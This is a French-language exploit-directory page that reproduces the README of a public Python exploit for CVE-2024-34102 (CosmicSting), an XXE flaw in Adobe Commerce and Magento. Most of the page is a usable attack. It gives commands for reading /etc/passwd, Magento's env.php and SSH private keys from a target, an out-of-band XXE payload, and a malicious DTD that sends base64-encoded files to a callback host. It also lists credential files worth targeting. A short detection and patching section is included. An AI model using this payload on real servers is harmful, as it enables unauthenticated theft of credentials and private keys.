Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-34102 — Exploit CVE-2024-34102 pour python3 | Kitploit
Outils/GitHubGitHub/nmmorette/cve-2024-34102
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnmmorette/cve-2024-34102

CVE-2024-34102

Exploit CVE-2024-34102 pour python3

Voir le dépôt
11il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-34102 - Exploitation CosmicSting XXE

Python Version CVE

Exploit pour CVE-2024-34102 (CosmicSting) - Vulnérabilité XML External Entity (XXE) dans Adobe Commerce et Magento.

📋 À propos de la vulnérabilité

CVE-2024-34102 est une vulnérabilité XXE critique (XML External Entity) affectant :

  • Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 et antérieures
  • Magento Open Source (mêmes versions)

Cette vulnérabilité permet à un attaquant non authentifié de :

  • 📄 Lire des fichiers arbitraires du serveur
  • 🔐 Exfiltrer des identifiants et des configurations sensibles
  • 💾 Accéder aux informations de la base de données
  • 🚨 Exécuter du code arbitraire (dans certains scénarios)

Score CVSS : 9.8 (Critique)

🎯 Crédits

Cet exploit est basé sur le travail original de :

  • @Chocapikk - CVE-2024-34102 original

Améliorations dans cette version :

  • ✅ Serveur DTD dynamique personnalisé (évite la dépendance à fars.ee)
  • ✅ Serveur de callback avec décodage automatique
Télécharger l’outil
  • ✅ Validation des paramètres requis
  • ✅ Logique de réessai pour les services externes
  • ✅ Messages d'erreur plus descriptifs
  • ✅ Support HTTPS pour les callbacks
  • ✅ Compatibilité totale avec Python 3.8+
  • 🛠️ Prérequis

    • Python 3.8 ou supérieur
    • Accès à un serveur pour héberger les fichiers DTD (VPS, Burp Collaborator, etc.)
    • Service de callback (Burp Collaborator, Oastify, ou votre propre serveur)

    📦 Installation

    root@kitploit:~
    # Clone the repository
    git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
    cd CVE-2024-34102
    
    # Install dependencies
    pip install -r requirements.txt
    

    🚀 Utilisation

    Méthode 1 : Utilisation de fars.ee (automatique)

    root@kitploit:~
    python3 exploit.py \
      -u https://target.com \
      -f /etc/passwd \
      -c your-callback.oastify.com
    

    Méthode 2 : Utilisation de votre propre serveur DTD

    Terminal 1 - Serveur DTD :

    root@kitploit:~
    sudo python3 server_dtd.py
    

    Terminal 2 - Exploit :

    root@kitploit:~
    python3 exploit.py \
      -u https://target.com \
      -f /etc/passwd \
      -c your-callback.oastify.com \
      --dtd-server YOUR-IP:8000
    

    Méthode 3 : Avec votre propre serveur de callback

    Terminal 1 - Serveur DTD :

    root@kitploit:~
    sudo python3 server_dtd.py
    

    Terminal 2 - Serveur de callback (décodage automatique) :

    root@kitploit:~
    sudo python3 callback_server.py
    

    Terminal 3 - Exploit :

    root@kitploit:~
    python3 exploit.py \
      -u https://target.com \
      -f /etc/passwd \
      -c YOUR-CALLBACK-IP \
      --dtd-server YOUR-DTD-IP:8000
    

    📝 Paramètres

    Requis :

    • -u, --url - URL cible (domaine de base)
    • -f, --file - Fichier à lire sur le serveur (ex. /etc/passwd)
    • -c, --callback - Serveur de callback (IP/domaine)

    Optionnel :

    • --dtd-server - Serveur personnalisé pour héberger le fichier DTD
    • --https - Utiliser HTTPS pour le callback (par défaut : HTTP)

    🎬 Exemples

    Lecture de /etc/passwd

    root@kitploit:~
    python3 exploit.py \
      -u https://vulnerable-site.com \
      -f /etc/passwd \
      -c abc123.oastify.com \
      --dtd-server 192.168.1.100:8000
    

    Lecture de la configuration Magento

    root@kitploit:~
    python3 exploit.py \
      -u https://vulnerable-site.com \
      -f /var/www/html/app/etc/env.php \
      -c abc123.oastify.com \
      --dtd-server 192.168.1.100:8000
    

    Lecture des clés SSH

    root@kitploit:~
    python3 exploit.py \
      -u https://vulnerable-site.com \
      -f /home/ubuntu/.ssh/id_rsa \
      -c abc123.burpcollaborator.net \
      --dtd-server 192.168.1.100:8000 \
      --https
    

    🔍 Fonctionnement

    1. XXE hors bande

    L'exploit utilise la technique XXE hors bande pour exfiltrer les données :

    root@kitploit:~
    <!-- Payload sent to target -->
    <!DOCTYPE r [
      <!ENTITY % sp SYSTEM "http://your-server/exploit.dtd">
      %sp;
      %param1;
    ]>
    <r>&exfil;</r>
    

    2. DTD externe

    Le serveur cible télécharge le DTD malveillant :

    root@kitploit:~
    <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
    <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">
    

    3. Exfiltration

    Le serveur traite le XML, lit le fichier, l'encode en base64 et l'envoie au callback :

    root@kitploit:~
    GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...
    

    4. Décodage

    root@kitploit:~
    echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d
    

    📊 Exemple de sortie

    root@kitploit:~
    [*] CosmicSting XXE Exploit (CVE-2024-34102)
    [*] Target: https://vulnerable-site.com
    [+] Callback Server: abc123.oastify.com
    [+] Using custom DTD server: 192.168.1.100:8000
    [+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http
    
    DTD will be dynamically generated with:
    [*]   Callback: http://abc123.oastify.com
    [*]   File: /etc/passwd
    
    DTD server is running? Ready to continue? [y/N]: y
    [+] Target file: /etc/passwd
    [+] Callback URL: http://abc123.oastify.com/?exploited=...
    [*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
    [*] Response status: 500
    [!] Status 500 - This is normal! XXE may have triggered.
    [!] Check your callback server for incoming requests.
    [*] Waiting for callback (5 seconds)...
    
    === CHECK YOUR CALLBACK SERVER ===
    [!] Monitor your callback service for incoming HTTP requests
    [!] Expected request: http://abc123.oastify.com/?exploited=<base64_data>
    
    To decode the exfiltrated data:
    [*]   echo 'BASE64_STRING' | base64 -d
    
    [!] Check your Burp Collaborator or Oastify dashboard now!
    

    🛡️ Détection et atténuation

    Pour les défenseurs :

    Détection :

    • Surveillez les requêtes HTTP vers les points de terminaison /rest/V1/guest-carts/*/estimate-shipping-methods
    • Alertez sur les charges utiles XML avec des entités externes (<!ENTITY)
    • Détectez les connexions sortantes vers des domaines suspects

    Atténuation :

    • Mettez à jour vers les versions corrigées :
      • Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9
    • Désactivez le traitement des entités externes dans l'analyseur XML
    • Implémentez un WAF avec des règles anti-XXE

    Pour les testeurs d'intrusion :

    Fichiers intéressants à tester :

    root@kitploit:~
    /etc/passwd
    /var/www/html/app/etc/env.php
    /var/www/html/app/etc/local.xml
    /home/USER/.ssh/id_rsa
    /var/log/apache2/access.log
    /proc/self/environ
    

    ⚖️ Avertissement légal

    root@kitploit:~
    This exploit is provided for educational and security research purposes only.
    
    Using this code to test systems without explicit authorization is ILLEGAL.
    
    You are SOLELY responsible for your actions. Use only on:
    ✅ Your own test environments
    ✅ Authorized bug bounty programs
    ✅ Contracted penetration tests
    
    DO NOT use on:
    ❌ Systems without authorization
    ❌ Production environments without permission
    ❌ Any malicious activity
    
    The author is not responsible for misuse of this code.
    

    📚 Références

    • Bulletin de sécurité Adobe APSB24-40
    • Détails CVE-2024-34102
    • Prévention XXE OWASP
    • Exploit original par Chocapikk

    ⭐ Si ce projet vous a été utile, merci de lui donner une étoile !